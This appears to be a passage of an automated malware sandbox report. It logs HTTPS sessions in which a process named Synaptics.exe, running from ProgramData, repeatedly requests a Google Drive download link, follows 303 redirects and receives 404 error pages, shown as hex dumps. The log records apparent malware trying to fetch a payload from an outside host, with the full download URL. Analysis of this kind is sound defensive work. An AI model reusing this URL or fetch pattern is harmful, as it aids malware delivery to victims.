                                                                                                                                      19192.168.2.549744142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:10 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-vU4Gim1bThmZDc9ygXhYbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      20192.168.2.549745142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:11 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:11 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HDw3QBA8V2XQec30ix3JTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      21192.168.2.549746142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:11 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC77M_I40sL7sAN07boDTTQ6Kg1UzZ4PLadHPoEc3GoMTkobyi9ewKL3QFiHqvfqd4-lFVFR7Ok
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:11 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-4t7u_gD_GtVsSwf5ekFksw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:11 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:11 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 43 6f 78 39 52 61 33 57 78 66 75 79 63 59 45 6c 75 77 49 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="sCox9Ra3WxfuycYEluwImA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:11 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      22192.168.2.549747142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:11 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:11 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-mneNhRzAU1HOcm6VI2OaEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      23192.168.2.549748142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:11 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5Uv6yhigimRTMEpP-qy4HWwYqvycpBA3u67CjejVuS0MlXSYMCDIxQwQJvaW-4jXjD
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:11 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-qF12cW335bJDFIzs_O2L9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:11 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:11 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 52 50 4e 4c 38 30 64 52 69 42 63 35 66 71 70 4f 70 6d 6c 6c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="NRPNL80dRiBc5fqpOpmllw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:11 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      24192.168.2.549752142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:12 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-B538g5B-wrSZbzquq2WJUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      25192.168.2.549753142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:12 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      26192.168.2.549754142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      27192.168.2.549755142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:12 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      28192.168.2.549759142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:13 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YHnEjAeIEAIma2s6yHnL6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      29192.168.2.549761142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:13 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-XJObjo2xduGa8tdvItiFiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      30192.168.2.549760142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:13 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:13 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4GF9Y45-KPByo5NRTVd0HxIQZVqFqnlcB6_xJvW7KR-aptmL7Pd3XfB2uu7ScAiNNTWoFn01M
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
